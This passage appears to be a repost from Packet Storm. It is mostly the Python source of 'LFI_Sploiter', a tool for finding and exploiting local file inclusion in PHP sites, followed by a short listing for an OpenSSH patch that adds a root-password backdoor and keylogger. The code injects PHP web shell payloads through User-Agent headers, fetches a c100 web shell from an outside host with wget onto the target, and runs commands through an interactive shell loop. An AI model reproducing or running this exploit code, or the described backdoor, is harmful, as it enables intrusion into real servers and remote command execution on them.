removed, ready to start a new scan") except: print("Ready to start a new scan..") step = str(raw_input("Custom step to dump application data?(Step meaning ../ ..\ ..// : ")) nullorno = str(raw_input("Scan with nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'y': for fuzz in fuzzer: myurl = url + fuzz + nullbyte print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'n': for lfi in lfi_load: myurl = url + step + lfi print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: pass elif option == "11": banner() info() elif option == "12": print("Bye \nCome back and see me anytime :)") sys.exit(0) else: try: main() except IndexError: print("Random text for error handling") except KeyboardInterrupt: print("Bye ") #############################################################Functions start here##################################################################### def scanner(url, base, outfile): req = urllib2.Request(url) req.add_header('UserAgent: ','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)') req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+base) response = urllib2.urlopen(req, timeout=10) html = response with open(outfile , 'a') as h1OBJ: h1OBJ.writelines("<b>Query Used: %s</b>" %(url)) h1OBJ.writelines(html) if h1OBJ.writelines(html): print("Html pages and responses have been written to %s" %(outfile)) else: pass def cleanup(file): print("Clearing old files before starting a new scan") os.remove(file) def option_error(): print("\t\t\t[--]Option error![--]\n\n\t\t[+]Please choose an offered option or exit![+]") usage() def banner(): if sys.platform == "linux" or sys.platform == "linux2": os.system('clear') else: os.system('cls') print("+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+") print("+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+") print("+==+==+==+==+==+ LFI Fuzzer/Exploiter/Log Includer/Shell +==+==+==+==+==+==+==+") print("+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+") print("+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+") print("codes by nullbyt3") def exploit_lfi(url): req = urllib2.Request(url) req.add_header('UserAgent: ','<?php system($_REQUEST["cmd"]);?>') req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) req = urllib2.Request(url) req.add_header('UserAgent: ','<?php shell_exec($_REQUEST["cmd"]);?>') req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) req = urllib2.Request(url) req.add_header('UserAgent: ','<?php eval($_REQUEST["cmd"]);?>') req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) req = urllib2.Request(url) req.add_header('UserAgent: ','<?php exec($_REQUEST["cmd"]);?>') req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) req = urllib2.Request(url) req.add_header('UserAgent: ','<?php passthru($_REQUEST["cmd"]);?>') req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) print("Code has been injected in a total of 5 requests!\nIf all went well you may have a shell waiting for you here:\n\n%s&&cmd={INJECT CODE HERE}" %(url)) def command_shell(site): end = "&&cmd=" cmd = str(raw_input("shell~$: ")) if cmd: try: mycmd = site + end + cmd print("injecting %s" %(cmd)) req = urllib2.Request(mycmd) response = urllib2.urlopen(req, timeout=10) print("Command response: %s" %(response)) except IOError as e: print("Error: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: print("Error executing command. Check for the shell manually") def exploit_environ(url): req = urllib2.Request(url) req.add_header("UserAgent: ","<? system('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php')?>)") req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) req = urllib2.Request(url) req.add_header("UserAgent: ","<?php shell_exec('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php');?>") req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) req = urllib2.Request(url) req.add_header("UserAgent: ","<?php eval('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php');?>") req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) req = urllib2.Request(url) req.add_header("UserAgent: ","<?php exec('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php');?>") req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) req = urllib2.Request(url) req.add_header("UserAgent: ","<?php passthru('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php');?>") req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) print("Done in 5 requests.\n\nIf all went well c100 shell should be available in root folder named lol.php: %s/lol.php" %(url)) def info(): print("""\n\n\tLFI_Sploiter is a simple tool to help in the fuzzing for, finding,and exploiting local file inclusions in Linux based PHP applications. Using special encoding and fuzzing techniques lfi_sploiter will scan for some known and some not so known LFI filter bypasses and exploits using some advanced encoding/bypass methods to try to bypass security and achieve its goal which is ultimately, exploiting a Local file inclusion.\n\n In adittion to LFI_Sploiter\'s fuzzing and encoding techniques it also has built in methods for LFI exploitation including /proc/self/environ shell exploit, File descriptor shell and LFI shell via log injection. LFI_Sploiter injects code using different command injection functions in the event that certain functions are disabled\n\n All codes written by nullbyt3 of securityoverride.com or 206.214.216.120/news.php. Report all bugs to nullbyt3@safe-mail.net Respect to TurboBorland, PublicEnemy, CrashOverron, bluechill, Teddy and many more from securityoverride who help me to stay in the game and keep spitting out code\n\n""") def usage(): print("==+==+==+==+==+==+==+==+==+==+==+=USAGE HERE=+==+==+==+==+==+==+==+==+==+==+==+") print("\t\t\troot@h@x0r~$%s " %(sys.argv[0])) print("==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+") print("Directions: To simply run the scan and follow the prompts ") if __name__ == '__main__': if sys.platform == "linux" or sys.platform == "linux2": os.system('clear') else: os.system('cls') sys.exit(main()) Download: http://packetstormsecurity.org/files/download/106912/LFI_fuzzploit-1.1.tar.gz Sursa: Comments ? Packet Storm

OpenSSH 5.5p1 Backdoor Authored by IPSECS This is a patch for OpenSSH version 5.5p1 that adds a magic root password backdoor that also keylogs. Download: http://packetstormsecurity.org/files/download/106930/openssh-5.5p1.patch.tar.gz Sursa: OpenSSH 5.5p1 Backdoor ? Packet Storm